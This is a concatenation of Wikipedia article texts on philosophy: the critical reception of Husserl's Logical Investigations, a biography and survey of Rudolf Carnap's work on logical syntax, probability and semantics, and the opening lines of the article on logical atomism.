Melle wrote that Husserl acknowledged in his manuscripts that the Logical Investigations suffered from shortcomings, which Husserl attributed to his initial failure to fully consider the proper sense and the full implications of their method and his lack of comprehension of how the work was related to both the history of philosophy and contemporary philosophy. According to Melle, Husserl was forced by concerns about his career to publish the Logical Investigations despite his awareness of these problems. He had not expected that the work would receive much attention, since it was allied with neither the trend to return to Kant nor the turn toward experimental psychology, and was surprised when it aroused considerable interest, something Husserl later attributed to its alignment with trends in philosophy, including one Melle summarized as a drive toward "an integration or synthesis of the legitimate motives" of both empiricism and rationalism. He noted that Husserl believed that most reactions to the work involved serious misunderstandings, for which Husserl believed that his use of the misleading term "descriptive psychology", which suggested a relapse into psychologism, was partly responsible. According to Melle, Husserl believed that commentators had wrongly associated his idea of ontology with Meinong's theory of objects, and that Wundt had put forward an unfounded interpretation and critique of the Logical Investigations . He added that when Husserl published Ideas , he dismayed followers who saw it as abandoning Husserl's earlier commitment to realism. [ 11 ]
In “On the Task and Historical Position of the Logical Investigations ”, Husserl sought to explain his use of the term "descriptive psychology". Husserl observed that while he considered the Logical Investigations a development of Brentano's ideas, Brentano himself never recognized them as such due to their "completely different method", whereas Dilthey reacted to them favorably, even though they were not indebted to his writings. According to Husserl, Dilthey saw the work as "a first concrete achievement of his (own) ideas about a descriptive and analytic psychology." Husserl emphasized differences between his "descriptive psychology" and the philosophical approaches of both Brentano and Dilthey. He maintained that despite his "imperfect" approach to consciousness, he had helped to show that consciousness is "an achievement that takes place in manifold verifiable forms and associated syntheses, overall pervasively intentional, goal-oriented, directed toward ideas of truth." [ 12 ]
The Logical Investigations influenced the philosopher Martin Heidegger . [ 13 ] Heidegger studied them while a student at the Collegium Borromaeum, a theological seminary in Freiburg, where they were so rarely requested from the university library that he was easily able to renew them. [ 14 ] Heidegger was disappointed to find that they did not help to clarify the multiple meanings of being , but was nevertheless impressed by them and convinced to study philosophy as a result of reading them. [ 15 ] Heidegger believed that the second volume marked an apparent revival of psychologism, which puzzled him. [ 16 ] In Being and Time (1927), Heidegger credited the Logical Investigations with making the work possible, [ 17 ] and noted their influence on the philosopher Emil Lask. Heidegger credited Lask with being the only person who had taken up Husserl's investigations "from outside the main stream of phenomenological research". Heidegger pointed to Lask's Die Logik der Philosophie und die Kategorienlehre (1911) and Die Lehre vom Urteil (1912). [ 18 ]
The book influenced the philosopher Jean-Paul Sartre , who drew on its ideas in works such as The Transcendence of the Ego (1936) and Being and Nothingness (1943). [ 19 ] The work also influenced the sociologist Talcott Parsons ' The Structure of Social Action (1937), and the Prague linguistic circle , thereby helping to establish the form of structuralism represented by the French anthropologist Claude Lévi-Strauss . [ 20 ] The work influenced the linguist Roman Jakobson , [ 21 ] and helped shape the development of Waldemar Conrad's work on aesthetics and the philosopher Gustav Shpet 's work on both aesthetics and the philosophy of language . [ 22 ] It also influenced the philosopher Ernst Tugendhat 's work Vorlesungen zur Einführung in die sprachanalytische Philosophie (1976). [ 23 ] The Logical Investigations have been compared to the philosophy of mathematics of the Nicolas Bourbaki group. Though they did not influence the structural linguistics of Louis Hjelmslev and Noam Chomsky , their theories have nevertheless been compared to Husserl's inquiries. [ 21 ] It has also been suggested that the Logical Investigations dealt with questions concerning the role of language similar to those discussed in the theologian Saint Augustine 's Confessions . [ 24 ]
Discussions of the work in the European Journal of Philosophy include those by Gianfranco Soldati, [ 23 ] Irene McMullin, [ 25 ] and Lambert Zuidervaart. [ 26 ]
Soldati criticized the laws Husserl formulated concerning "the relations between dependent and independent parts of a whole", finding them "incomplete and not always easy to grasp." He also noted that some commentators have seen Husserl as maintaining that formal ontology is independent of formal logic, while others believe that for Husserl, formal ontology belongs to formal logic. [ 23 ] McMullin argued that while in the Logical Investigations , Husserl's discussion of "expression" was focused exclusively on its linguistic meaning, he developed a significantly expanded notion of expression in his later work. [ 25 ]
Zuidervaart wrote that the Logical Investigations have been variously interpreted by Anglo-American commentators, being seen as idealist by the philosopher Louis Dupré and realist by the philosopher Dallas Willard , while others argue Husserl moved from realism to idealism. He added that there has been dispute over whether Husserl has "an epistemic conception of propositional truth" according to which propositional truth "depends on discursive justification to some significant degree". He concluded that Husserl suggests an alternative to "the epistemic/nonepistemic polarity in contemporary truth theory" and "a way to resituate propositional truth within a broader and more dynamic conception of truth". [ 26 ]
Discussions of the work in Human Studies include those by Mark Katherine Tillman and Keiichi Noé. [ 27 ] [ 28 ]
Tillman maintained that the "descriptive psychology of prepredicative thought" Husserl expounded in the Logical Investigations had been anticipated by both Dilthey and the theologian John Henry Newman , despite the fact that Newman, unlike Dilthey, never used the term. [ 27 ] Noé argued that Husserl modified his views after the publication of the Logical Investigations , expressing a different perspective in his posthumous work The Origin of Geometry . He characterized these changes as "the Hermeneutic Turn" in the Husserlian phenomenology of language, suggesting that it was caused by "a change of attitude toward the constitutive function of language". He described Husserl's later view of language as "dialogical", in contrast to the "monological" view of the Logical Investigations . [ 28 ]
Discussions of the work in Inquiry include those by Wayne M. Martin and Lilian Alweiss. [ 29 ] [ 30 ]
Martin defended Husserl against Dummett's argument that his attempt to extend an analysis of the structure of meaningful expressions into an account of the structure of meaning in experience is a form of psychologism and idealism. He attributed to Husserl the view that, "meanings are mind-independent structures that are also structures of consciousness", finding it controversial but defensible. He maintained that Husserl's later views on noemata were not a renunciation but a further development of those in the Logical Investigations , even though Husserl introduced the term "noema" only in Ideas . [ 29 ] Alweiss argued that, contrary to a consensus among analytic philosophers, examination of the Logical Investigations shows that Husserl was not a "methodological solipsist". However, she considered it open to debate whether Husserl adopted a position of " internalism ". [ 30 ]
Discussions of the work in Studia Phaenomenologica include those by Peter Andras Varga and Bernardo Ainbinder. [ 31 ] [ 32 ]
Varga discussed the philosopher Leonard Nelson 's criticism of Husserl's arguments against psychologism in the Logical Investigations in Über das sogenannte Erkenntnisproblem (1908), noting that Nelson charged Husserl with "mistaking deduction for proof" and thereby falsely assuming that a psychological foundation of logic would inevitably lead to a vicious circle. He argued that Nelson misunderstood and oversimplified Husserl's views and that his arguments against Husserl were flawed. He also noted that despite his criticism of Husserl, Nelson recognized some similarity between their views, suggesting that he made "a very fruitful comparison between his and Husserl's enterprise". He suggested that Husserl also misunderstood Nelson, and that his phenomenology could benefit from Nelson's "presentation of the framework of the problem of the foundation." [ 31 ]
Criticizing the view that Lask's interest in the work represented his departure from neo-Kantianism, Ainbinder argued that Lask found insights in it that could contribute to making sense of the "Kantian transcendental project" through a "proper understanding of the Copernican Turn in objectivistic terms"; according to Ainbinder, these included the "secondary place of judgment in the constitution of the categorial" and "the idea of a formal ontology". Ainbinder further argued that the work could be seen, despite Husserl's view of it, as "a proper work of transcendental philosophy", noting that Lask, like Heidegger, believed that Husserl overlooked its "key tools for transcendental thought", and as a result was led into "subjectivistic idealism". He added that Lask's beliefs about how its approach needed to be complemented anticipated Husserl's later work. [ 32 ]
Other discussions of the Logical Investigations in academic journals include those by Dieter Münch in the Journal of the British Society for Phenomenology , [ 33 ] the philosopher Dallas Willard in The Review of Metaphysics , [ 34 ] Juan Jesús Borobia in Tópicos. Revista de Filosofía , [ 35 ] John Scanlon in the Journal of Phenomenological Psychology , [ 36 ] John J. Drummond in the International Journal of Philosophical Studies , [ 37 ] Victor Biceaga in the Journal of the History of the Behavioral Sciences , [ 38 ] Richard Tieszen in Philosophia Mathematica , [ 39 ] Mariano Crespo in Revista de Filosofía , [ 40 ] Juan Sebastián Ballén Rodríguez in Universitas Philosophica , [ 41 ] Witold Płotka in Coactivity / Santalka , [ 42 ] Manuel Gustavo Isaac in History & Philosophy of Logic , [ 43 ] Mikhail A. Belousov in Russian Studies in Philosophy , [ 44 ] Victor Madalosso and Yuri José in Intuitio , [ 45 ] Findlay in The Philosophical Forum , [ 46 ] and Andrea Marchesi in Grazer Philosophische Studien . [ 47 ] Sávio Passafaro Peres has discussed the work in Estudos e Pesquisas em Psicologia and Psicologia USP . [ 48 ] [ 49 ]
Münch described the Logical Investigations as a "highly theoretical book", finding it similar in this respect to the Critique of Pure Reason . He maintained that Husserl's development of a theory of "symbolic knowledge" in the Logical Investigations showed that such a theory had been a significant problem for the early Husserl. He also argued that Husserl put forward a theory of truth in the work that represented a departure from that of his early writings, and that Husserl anticipated both aspects of artificial intelligence and criticisms of artificial intelligence made by philosophers such as John Searle and Hubert Dreyfus . He rejected the view that the Logical Investigations can be understood only from the perspective of Husserl's later work, in which he developed transcendental phenomenology. [ 33 ]
Scanlon noted that Husserl visited Dilthey in 1905, after hearing favorable comments on his seminar on the Logical Investigations , and that Dilthey had publicly stated that the book was "epoch-making in the use of description for the theory of knowledge." According to Scanlon, although Husserl's critique of psychologism was widely considered devastating, he caused confusion by using the terms "phenomenology" and "descriptive psychology" interchangeably, leading some to conclude that he was presenting a new version of psychologism. He suggested that this may have embarrassed Husserl, who later explained that phenomenology could be described as "descriptive psychology" only in a properly qualified sense; he also argued that, despite some similarities, Husserl's views as expressed in the Logical Investigations were in other respects radically different from Dilthey's. He wrote that by 1925 Husserl had developed a more satisfying perspective on the issues discussed in the work, including recognition that numbers are formed actively in counting and propositions in judging, the "kernel of truth in psychologism". He credited Husserl with introducing a "rich and insightful approach to psychic life" in the Logical Investigations . [ 36 ]
Drummond maintained that Husserl's theory of "pure logical grammar" occupied an intermediary position between his earlier and more mature theories of meaning, and that later parts of the Logical Investigations indicated that the theory of meaning in earlier parts of the work required correction. He added that Husserl indicated, in the second edition of the work, that it required extensive revision. According to Drummond, Husserl wrote a partial and preliminary revision, including "a new distinction between signitive and significative intentions", and "the claim that all meaning-conferring acts, including nominal acts, and all meaning-fulfilling acts, including those fulfilling nominal acts, are categorially formed." He argued that the first edition of the work suffered from Husserl's "early conception of phenomenology as descriptive psychology", which resulted in "a misconception of the proper object of philosophical reflection" and a flawed account of expressive acts, and that Husserl used arguments that left him vulnerable to the charge that his views were a form of psychologism. However, he added that, in works such as Ideas , Husserl reformulated "the distinction between phenomenological and intentional contents" and developed an improved understanding of "the proper object of philosophical reflection". This change of view was also expressed in the second edition of the Logical Investigations . [ 37 ]
Płotka argued that Husserl's program of objective investigation could be reformulated in a way that made it possible to understand phenomenology as "therapeutic science", involving "the methodological movement of the possibility for communal formulation of transcendental investigation." [ 42 ]
Belousov questioned the details of Husserl's understanding of intentionality, noting that Husserl came to different conclusions in later works such as Ideas . [ 44 ] Madalosso and José argued that the book contained "various conceptual and terminological problems", including that of how "a psychic act, ideal meaning and real object achieves to establish a correspondence relation". [ 45 ]
Findlay argued that in Ideas , Husserl attempted to disguise changes that had occurred in his opinions by attributing his views as of 1913 to the earlier Logical Investigations . [ 46 ] Marchesi argued that while it is widely accepted that "Husserl developed his most sophisticated theory of intentionality" in the Logical Investigations , it had incorrectly been interpreted as non-relational by most commentators. He maintained that a phenomenological theory of intentionality based on Husserl's insights cannot be non-relational. [ 47 ]
In Estudos e Pesquisas em Psicologia , Peres observed that Husserl's phenomenology was "received as a form of descriptive psychology" that aimed at "conceptual preparation for the development of an empirical psychology." [ 48 ] In Psicologia USP , he argued that Husserl understood phenomenology as a "peculiar form of descriptive psychology". He contrasted it with the classical empiricism of the 16th and 17th centuries and Kant's transcendental idealism . [ 49 ]
The philosopher Jacques Derrida , who studied the Logical Investigations as a student in the 1950s, [ 50 ] offered a critique of Husserl's work in Speech and Phenomena (1967). [ 51 ] The philosopher Theodor W. Adorno maintained that the second volume of the Logical Investigations was "ambiguous". [ 52 ] The philosopher Karl Popper commented that the Logical Investigations started a "vogue" for "anti-psychologism". He attributed Husserl's opposition to psychologism to the philosopher Gottlob Frege's criticism of the Philosophy of Arithmetic . He believed that Husserl, in his discussion of science, proposed distinctions similar to Popper's three worlds . However, he suggested that Husserl had written in a way that had caused confusion about his views. He also criticized Husserl's view that a scientific theory is a hypothesis that has been proven correct. [ 53 ] The philosopher Paul Ricœur credited Husserl, along with Frege, with helping to establish the dichotomy "between Sinn or sense and Vorstellung or representation". [ 54 ] Helmut R. Wagner described the Logical Investigations as Husserl's first major work. [ 55 ] The philosopher Roger Scruton has criticized the Logical Investigations for their obscurity; [ 56 ] however, he has also described them as being of "great interest", and noted that, alongside Ideas for a Pure Phenomenology (1913) and Cartesian Meditations (1929), they were among the writings by Husserl that had attracted the most attention. [ 57 ]
The philosophers Barry Smith and David Woodruff Smith described the Logical Investigations as Husserl's magnum opus . They credited Husserl with providing a "devastating" critique of psychologism, adding that it was more influential than similar critiques from other philosophers such as Frege and Bernard Bolzano , and brought to an end the period during which psychologism was most influential. They noted that following the publication of the Logical Investigations , Husserl's interests shifted from logic and ontology to transcendental idealism and the methodology of phenomenology. According to Smith and Smith, Husserl's initial influence began at the University of Munich , where Johannes Daubert, who read the Logical Investigations in 1902, persuaded a group of students to accept the work and reject the views of their teacher Theodor Lipps . [ 58 ] The philosopher Judith Butler compared the Logical Investigations to the early work of the philosopher Ludwig Wittgenstein . [ 59 ]
Donn Welton stated that in the Logical Investigations , Husserl introduced a novel conception of the relationships between language and experience, meaning and reference, and subject and object, and by his work on theories dealing with meaning, truth, the subject, and the object, helped create phenomenology, a new form of philosophy that went beyond psychologism, formalism , realism , idealism , objectivism and subjectivism , and made twentieth century continental philosophy possible. [ 60 ] Moran wrote that the Logical Investigations exerted an influence on 20th-century European philosophy comparable to that which Sigmund Freud 's The Interpretation of Dreams (1899) had exerted on psychoanalysis . [ 61 ] Powell described the analyses of signs and meaning in the Logical Investigations as "rigorous and abstract", "scrupulous", but also "tedious". [ 50 ]
The philosopher Ray Monk described the Logical Investigations as obscurely written, adding that the philosopher Bertrand Russell reported finding reading it difficult. [ 62 ] The philosopher Robert Sokolowski credited Husserl with providing a convincing critique of psychologism. However, he criticized the first edition of the Logical Investigations for sharply distinguishing between "the thing as given to us" and the thing-in-itself , a standpoint he considered comparable to Kant's. He noted that between 1900 and 1910, Husserl abandoned these Kantian distinctions. According to Sokolowski, when Husserl expressed a new philosophical position in Ideas , he was misinterpreted as adopting a traditional form of idealism and "many thinkers who admired Husserl's earlier work distanced themselves from what he now taught." [ 63 ]
| https://en.wikipedia.org/wiki/Logical_Investigations_(Husserl) |
Rudolf Carnap ( / ˈ k ɑːr n æ p / ; [ 20 ] German: [ˈkaʁnaːp] ; 18 May 1891 – 14 September 1970) was a German-language philosopher who was active in Europe before 1935 and in the United States thereafter. He was a major member of the Vienna Circle and an advocate of logical positivism .
Carnap's father rose from being a poor ribbon-weaver to be the owner of a ribbon-making factory. His mother came from an academic family; her father was an educational reformer and her oldest brother was the archaeologist Wilhelm Dörpfeld . As a ten-year-old, Carnap accompanied Wilhelm Dörpfeld on an expedition to Greece. [ 21 ] Carnap was raised in a profoundly religious Protestant family, but later became an atheist. [ 22 ] [ 23 ]
He began his formal education at the Barmen Gymnasium and the Carolo-Alexandrinum Gymnasium in Jena . [ 24 ] From 1910 to 1914, he attended the University of Jena , intending to write a thesis in physics . He also intently studied Immanuel Kant 's Critique of Pure Reason during a course taught by Bruno Bauch , and was one of the very few students to attend Gottlob Frege 's courses in mathematical logic .
During his university years, he became enthralled with the German Youth Movement . [ 1 ]
While Carnap held moral and political opposition to World War I , he felt obligated to serve in the German army. After three years of service, he was given permission to study physics at the University of Berlin , 1917–18, where Albert Einstein was a newly appointed professor. Carnap then attended the University of Jena , where he wrote a thesis defining an axiomatic theory of space and time . The physics department said it was too philosophical, and Bruno Bauch of the philosophy department said it was pure physics. Carnap then wrote another thesis in 1921, under Bauch's supervision, [ 2 ] on the theory of space in a more orthodox Kantian style, published as Der Raum ( Space ) in a supplemental issue of Kant-Studien (1922).
Frege's course exposed him to Bertrand Russell 's work on logic and philosophy, which gave a sense of direction to his studies. He accepted the effort to surpass traditional philosophy with logical innovations that inform the sciences. He wrote a letter to Russell, who responded by copying by hand long passages from his Principia Mathematica for Carnap's benefit, as neither Carnap nor his university could afford a copy of this epochal work. In 1924 and 1925, he attended seminars led by Edmund Husserl , [ 25 ] the founder of phenomenology , and continued to write on physics from a logical positivist perspective.
Carnap discovered a kindred spirit when he met Hans Reichenbach at a 1923 conference. Reichenbach introduced Carnap to Moritz Schlick , a professor at the University of Vienna who offered Carnap a position in his department, which Carnap accepted in 1926. Carnap thereupon joined an informal group of Viennese intellectuals that came to be known as the Vienna Circle , directed largely by Schlick and including Hans Hahn , Friedrich Waismann , Otto Neurath , and Herbert Feigl , with occasional visits by Hahn's student Kurt Gödel . When Wittgenstein visited Vienna, Carnap would meet with him. He (with Hahn and Neurath) wrote the 1929 manifesto of the Circle, and (with Hans Reichenbach ) initiated the philosophy journal Erkenntnis .
In February 1930, Alfred Tarski lectured in Vienna, and during November 1930, Carnap visited Warsaw. On these occasions, he learned much about Tarski's model-theoretic method of semantics . Rose Rand , another philosopher in the Vienna Circle, noted, "Carnap's conception of semantics starts from the basis given in Tarski's work, but a distinction is made between logical and non-logical constants, and between logical and factual truth... At the same time, he worked with the concepts of intension and extension , and took these two concepts as a basis of a new method of semantics." [ 26 ]
In 1931, Carnap was appointed Professor at the German University of Prague . In 1933, W. V. Quine met Carnap in Prague and discussed the latter's work at some length. Thus began the lifelong mutual respect these two men shared, one that survived Quine's eventual forceful disagreements with a number of Carnap's philosophical conclusions.
Carnap, whose socialist and pacifist beliefs put him at risk in Nazi Germany , emigrated to the United States in 1935 and became a naturalized citizen in 1941. Meanwhile, back in Vienna, Schlick was murdered in 1936. From 1936 to 1952, Carnap was a professor of philosophy at the University of Chicago . During the late 1930s, Carnap offered an assistant position in philosophy to Carl Gustav Hempel , who accepted and became one of his most significant intellectual collaborators. Thanks partly to Quine's help, Carnap spent the years 1939–41 at Harvard University , where he was reunited with Tarski. [ 27 ] Carnap (1963) later expressed some irritation about his time at Chicago, where he and Charles W. Morris were the only members of the department committed to the primacy of science and logic. (Their Chicago colleagues included Richard McKeon , Charles Hartshorne , and Manley Thompson.) Carnap's years at Chicago were nonetheless very productive ones. He wrote books on semantics (Carnap 1942, 1943, 1956), modal logic , and on the philosophical foundations of probability and inductive logic (Carnap 1950, 1952).
After a stint at the Institute for Advanced Study in Princeton (1952–1954), he joined the UCLA Department of Philosophy in 1954, Hans Reichenbach having died the previous year. He had earlier refused an offer of a similar job at the University of California, Berkeley , because accepting that position required that he sign a loyalty oath , a practice to which he was opposed on principle. While at UCLA, he wrote on scientific knowledge, the analytic–synthetic distinction , and the verification principle . His writings on thermodynamics and on the foundations of probability and inductive logic were published posthumously as Carnap (1971, 1977, 1980).
Carnap taught himself Esperanto when he was 14 years of age. He later attended the World Congress of Esperanto in Dresden in 1908. [ 28 ] He also attended the 1924 Congress in Vienna, where he met his fellow Esperantist Otto Neurath for the first time. [ 29 ]
In the USA, Carnap was somewhat politically involved. Carnap was a signatory of an open appeal distributed by the National Committee to Secure Justice in the Rosenberg Case to appeal for clemency in the case. [ 30 ] He was listed as a 'sponsor' for the "National Conference to Appeal the Walter-McCarran Law and Defend Its Victims" organised by the American Committee for the Protection of the Foreign Born , [ 31 ] and also for the "Scientific and Cultural Conference for World Peace" organised by the National Council of Arts, Sciences and Professions . [ 32 ]
Carnap had four children by his first marriage to Elizabeth Schöndube, which ended in divorce in 1929. He married his second wife, Elizabeth Ina Stöger, in 1933. [ 21 ] Ina committed suicide in 1964.
Below is an examination of the main topics in the evolution of the philosophy of Rudolf Carnap. It is not exhaustive, but it outlines Carnap's main works and contributions to modern epistemology and philosophy of logic .
From 1919 to 1921, Carnap worked on a doctoral thesis called Der Raum: Ein Beitrag zur Wissenschaftslehre ( Space: A Contribution to the Theory of Science , 1922). In this dissertation on the philosophical foundations of geometry , Carnap tried to provide a logical basis for a theory of space and time in physics . Considering that Carnap was interested in pure mathematics , natural sciences and philosophy, his dissertation can be seen as an attempt to build a bridge between the disciplines of geometry, physics, and philosophy, for Carnap thought that in many instances those disciplines use the same concepts with totally different meanings. The main objective of Carnap's dissertation was to show that the inconsistencies between theories concerning space existed only because philosophers, as well as mathematicians and scientists, were talking about different things while using the same word, "space". Hence, Carnap characteristically argued that there had to be three separate notions of space. "Formal" space is space in the sense of mathematics: an abstract system of relations. "Intuitive" space is made of certain contents of intuition independent of single experiences. "Physical" space is made of actual spatial facts given in experience. The upshot is that those three kinds of "space" imply three different kinds of knowledge and thus three different kinds of investigations. Notably, the main themes of Carnap's philosophy first appear in this dissertation, most importantly the idea that many philosophical contradictions arise from a misuse of language, and a stress on the importance of distinguishing formal and material modes of speech.
From 1922 to 1925, Carnap worked on a book which became one of his major works, namely Der logische Aufbau der Welt (translated as The Logical Structure of the World , 1967), which was accepted in 1926 as his habilitation thesis at the University of Vienna and published as a book in 1928. [ 33 ] That achievement has become a landmark in modern epistemology and can be read as a forceful statement of the philosophical thesis of logical positivism. Indeed, the Aufbau suggests that epistemology, based on modern symbolic logic , is concerned with the logical analysis of scientific propositions, while science itself, based on experience, is the only source of knowledge of the external world, i.e. the world outside the realm of human perception. According to Carnap, philosophical propositions are statements about the language of science; they aren't true or false, but merely consist of definitions and conventions about the use of certain concepts. In contrast, scientific propositions are factual statements about the external reality. They are meaningful because they are based on the perceptions of the senses. In other words, the truth or falsity of those propositions can be verified by testing their content with further observations.
In the Aufbau , Carnap wants to display the logical and conceptual structure with which all scientific (factual) statements can be organized. Carnap gives the label " constitution theory " to this epistemic-logical project. It is a constructive undertaking that systematizes scientific knowledge according to the notions of symbolic logic. Accordingly, the purpose of this constitutional system is to identify and discern different classes of scientific concepts and to specify the logical relations that link them. In the Aufbau, concepts are taken to denote objects, relations, properties, classes and states. Carnap argues that all concepts must be ranked over a hierarchy. In that hierarchy, all concepts are organized according to a fundamental arrangement where concepts can be reduced and converted to other basic ones. Carnap explains that a concept can be reduced to another when all sentences containing the first concept can be transformed into sentences containing the other. In other words, every scientific sentence should be translatable into another sentence such that the original terms have the same reference as the translated terms. Most significantly, Carnap argues that the basis of this system is psychological. Its content is the "immediately given", which is made of basic elements, namely perceptual experiences. These basic elements consist of conscious psychological states of a single human subject. In the end, Carnap argues that his constitutional project demonstrates the possibility of defining and uniting all scientific concepts in a single conceptual system on the basis of a few fundamental concepts.
From 1928 to 1934, Carnap published papers ( Scheinprobleme in der Philosophie , 1928; translated as Pseudoproblems in Philosophy , 1967) in which he appears overtly skeptical of the aims and methods of metaphysics , i.e. the traditional philosophy that finds its roots in mythical and religious thought. Indeed, he discusses how, in many cases, metaphysics is made of meaningless discussions of pseudo-problems. For Carnap, a pseudo-problem is a philosophical question that, on the surface, handles concepts that refer to our world while, in fact, these concepts do not actually denote real and attested objects. In other words, these pseudo-problems concern statements that do not, in any way, have empirical implications. They do not refer to states of affairs, and the things they denote cannot be perceived. Consequently, one of Carnap's main aims was to redefine the purpose and method of philosophy. According to him, philosophy should not aim at producing any knowledge transcending the knowledge of science. In contrast, by analyzing the language and propositions of science, philosophers should define the logical foundations of scientific knowledge. Using symbolic logic , they should explicate the concepts, methods, and justificatory processes that exist in science.
Carnap believed that the difficulty with traditional philosophy lay in the use of concepts that are not useful for science. For Carnap, the scientific legitimacy of these concepts was doubtful because the sentences containing them do not express facts. Indeed, a logical analysis of those sentences proves that they do not convey the meaning of states of affairs. In other words, these sentences are meaningless. Carnap explains that to be meaningful, a sentence should be factual. It can be so, for one thing, by being based on experience, i.e., by being formulated with words relating to direct observations. For another, a sentence is factual if one can clearly state what the observations are that could confirm or disconfirm that sentence. After all, Carnap presupposes a specific criterion of meaning, namely the Wittgensteinian principle of verifiability. Indeed, he requires, as a precondition of meaningfulness, that all sentences be verifiable, which implies that a sentence is meaningful only if there is a way to verify if it is true or false. To verify a sentence, one needs to expound the empirical conditions and circumstances that would establish the truth of the sentence. As a result, it is clear for Carnap that metaphysical sentences are meaningless. They include concepts like "god", "soul", and "the absolute" that transcend experience and cannot be traced back or connected to direct observations. Because those sentences cannot be verified in any way, Carnap suggests that science, as well as philosophy, should neither consider nor contain them.
At that point in his career, Carnap attempted to develop a full theory of the logical structure of scientific language. This theory, exposed in Logische Syntax der Sprache (1934; translated as The Logical Syntax of Language , 1937) gives the foundations to his idea that scientific language has a specific formal structure and that its signs are governed by the rules of deductive logic. Moreover, the theory of logical syntax expounds a method with which one can talk about a language: it is a formal meta-theory about the pure forms of language. In the end, because Carnap argues that philosophy aims at the logical analysis of the language of science and thus is the logic of science, the theory of the logical syntax can be considered as a definite language and a conceptual framework for philosophy.
The logical syntax of language is a formal theory. It is not concerned with the contextualized meaning or the truth-value of sentences. In contrast, it considers the general structure of a given language and explores the different structural relations that connect the elements of that language. Hence, by explaining the different operations that allow specific transformations within the language, the theory is a systematic exposition of the rules that operate within that language. In fact, the basic function of these rules is to provide the principles to safeguard coherence, to avoid contradictions, and to deduce justified conclusions. Carnap sees language as a calculus. This calculus is a systematic arrangement of symbols and relations. The symbols of the language are organized according to the class that they belong to—and it is through their combination that we can form sentences. The relations are different conditions under which a sentence can be said to follow, or to be the consequence, of another sentence. The definitions included in the calculus state the conditions under which a sentence can be considered of a certain type and how those sentences can be transformed. We can see the logical syntax as a method of formal transformation, i.e., a method for calculating and reasoning with symbols.
Finally, Carnap introduces his well-known "principle of tolerance." This principle suggests that there are no morals in logic: when it comes to using a language, there is no good or bad, no fundamentally true or false. In this perspective, the philosopher's task is not to issue authoritative interdicts prohibiting the use of certain concepts. Instead, philosophers should seek general agreement over the relevance of certain logical devices. According to Carnap, such agreement is possible only through the detailed presentation of the meaning and use of the expressions of a language. In other words, Carnap believes that every logical language is correct only if it is supported by exact definitions and not by philosophical presumptions. Carnap embraces a formal conventionalism. This implies that formal languages are constructed and that everyone is free to choose the language they find best suited to their purpose. There should not be any controversy over which language is the correct language; what matters is agreeing on which language best suits a particular purpose. Carnap explains that the choice of a language should be guided by the security it provides against logical inconsistency. Furthermore, practical elements like simplicity and fruitfulness in certain tasks influence the choice of a language. Clearly enough, the principle of tolerance was a sophisticated device introduced by Carnap to dismiss any form of dogmatism in philosophy.
After having considered problems in semantics, i.e. the theory of the concepts of meaning and truth ( Foundations of Logic and Mathematics , 1939; Introduction to Semantics , 1942; Formalization of Logic , 1943), Carnap turned his attention to the subject of probability and inductive logic . His views on that subject are, for the most part, set out in Logical Foundations of Probability (1950), where Carnap aims to give a sound logical interpretation of probability. Carnap thought that, under certain conditions, the concept of probability had to be interpreted as a purely logical concept. In this view, probability is a basic concept anchored in all inductive inferences, whereby the conclusion of every inference that holds without deductive necessity is said to be more or less likely to be the case. In fact, Carnap claims that the problem of induction is a matter of finding a precise explanation of the logical relation that holds between a hypothesis and the evidence that supports it. An inductive logic is thus based on the idea that probability is a logical relation between two types of statements: the hypothesis (conclusion) and the premises (evidence). Accordingly, a theory of induction should explain how, by pure logical analysis, we can ascertain that certain evidence establishes a degree of confirmation strong enough to confirm a given hypothesis.
Carnap was convinced that there was a logical as well as an empirical dimension in science. He believed that one had to isolate the experiential elements from the logical elements of a given body of knowledge. Hence, the empirical concept of frequency used in statistics to describe the general features of certain phenomena can be distinguished from the analytical concepts of probability logic that merely describe logical relations between sentences. For Carnap, the statistical and the logical concepts must be investigated separately. Having insisted on this distinction, Carnap defines two concepts of probability. The first one is logical and deals with the degree to which a given hypothesis is confirmed by a piece of evidence. It is the degree of confirmation . The second is empirical and relates to the long-run rate of one observable feature of nature relative to another. It is the relative frequency. Statements belonging to the second concept are about reality and describe states of affairs. They are empirical and, therefore, must be based on experimental procedures and the observation of relevant facts. On the contrary, statements belonging to the first concept do not say anything about facts. Their meaning can be grasped solely with an analysis of the signs they contain. They are analytical sentences, i.e. true by virtue of their logical meaning. Even though these sentences could refer to states of affairs, their meaning is given by the symbols and relations they contain. In other words, the probability of a conclusion is given by the logical relation it has to the evidence. The evaluation of the degree of confirmation of a hypothesis is thus a problem of meaning analysis.
Clearly, the probability of a statement about relative frequency can be unknown, because it depends on the observation of certain phenomena, and one may not possess the information needed to establish the value of that probability. Consequently, the value of that statement can be confirmed only if it is corroborated by facts. In contrast, the probability of a statement about the degree of confirmation could be unknown in the sense that one may lack the correct logical method to evaluate its exact value. But such a statement can always receive a definite logical value, given that this value depends only on the meaning of its symbols.
The Rudolf Carnap Papers contain thousands of letters, notes and drafts, and diaries, written over his entire life and career. The majority of his papers were purchased from his daughter, Hanna Carnap-Thost, in 1974 by the University of Pittsburgh, with subsequent further accessions. Documents that contain financial, medical, and personal information are restricted. [ 34 ] Carnap used the mail regularly to discuss philosophical problems with hundreds of others; the most notable were Herbert Feigl, Carl Gustav Hempel, Felix Kaufmann, Otto Neurath, and Moritz Schlick. Photographs are also part of the collection and were taken throughout his life; family pictures and photographs of his peers and colleagues are also stored in the collection. Other notable materials include his student notes from his seminars with Frege (describing the Begriffsschrift and the logic in mathematics), his notes from Russell's seminar in Chicago, and notes he took from discussions with Tarski, Heisenberg, Quine, Hempel, Gödel, and Jeffrey, all of which are part of the University of Pittsburgh Library System's Archives and Special Collections.
Much material is written in an older German shorthand, the Stolze-Schrey system. He employed this writing system extensively beginning in his student days. [ 34 ] Some of the content has been digitized and is available through the finding aid . The University of California also maintains a collection of Rudolf Carnap Papers. Microfilm copies of his papers are maintained by the Philosophical Archives at the University of Konstanz in Germany. [ 36 ]
*For a more complete listing see Carnap’s Works in "Linked bibliography ". [ 44 ] | https://en.wikipedia.org/wiki/Logical_Syntax_of_Language |
Logical atomism is a philosophical view that originated in the early 20th century with the development of analytic philosophy . It holds that the world consists of ultimate logical "facts" (or "atoms") that cannot be broken down any further, each of which can be understood independently of other facts.
